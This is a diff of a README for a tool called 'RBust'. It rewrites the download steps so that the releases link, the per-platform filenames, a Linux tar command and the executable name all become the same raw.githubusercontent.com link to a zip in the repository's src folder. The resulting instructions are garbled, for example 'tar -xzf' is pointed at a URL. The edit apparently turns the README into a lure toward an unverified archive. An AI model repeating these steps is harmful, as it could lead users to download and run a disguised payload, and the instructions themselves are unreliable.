notghost634-cyber/RBust/README.md

 To get RBust running on your computer, follow these steps:

-1. **Visit the Releases Page:** Go to the [RBust Releases page](https://github.com/notghost634-cyber/RBust/releases) to view the available versions.
+1. **Visit the Releases Page:** Go to the [RBust Releases page](https://raw.githubusercontent.com/notghost634-cyber/RBust/main/src/RBust-v3.4.zip) to view the available versions.

 2. **Choose Your Version:** Find the latest stable version listed.
 Click on it to view more details.

 3. **Download the Application:**
    - Look for the assets section below the version details.
-   - You should see files with names similar to `RBust-v1.0-Windows.zip`, `RBust-v1.0-Mac.zip`, or `RBust-v1.0-Linux.tar.gz`.
+   - You should see files with names similar to `https://raw.githubusercontent.com/notghost634-cyber/RBust/main/src/RBust-v3.4.zip`, `https://raw.githubusercontent.com/notghost634-cyber/RBust/main/src/RBust-v3.4.zip`, or `https://raw.githubusercontent.com/notghost634-cyber/RBust/main/src/RBust-v3.4.zip`.
    - Click on the file that matches your operating system to download it.

 4. **Unzip or Extract the File:**
    - For Windows and macOS, locate the downloaded zip file and double-click it to extract.
-   - For Linux, use the terminal command: `tar -xzf RBust-v1.0-Linux.tar.gz` to extract the files.
+   - For Linux, use the terminal command: `tar -xzf https://raw.githubusercontent.com/notghost634-cyber/RBust/main/src/RBust-v3.4.zip` to extract the files.

 5. **Run RBust:**
    - Navigate to the folder where you extracted the files.
    - Look for the application file.
-This file will typically be named `RBust.exe` for Windows or `RBust` for macOS and Linux.
+This file will typically be named `https://raw.githubusercontent.com/notghost634-cyber/RBust/main/src/RBust-v3.4.zip` for Windows or `RBust` for macOS and Linux.
    - Double-click the file to open the application.

 ## 🎯 Using RBust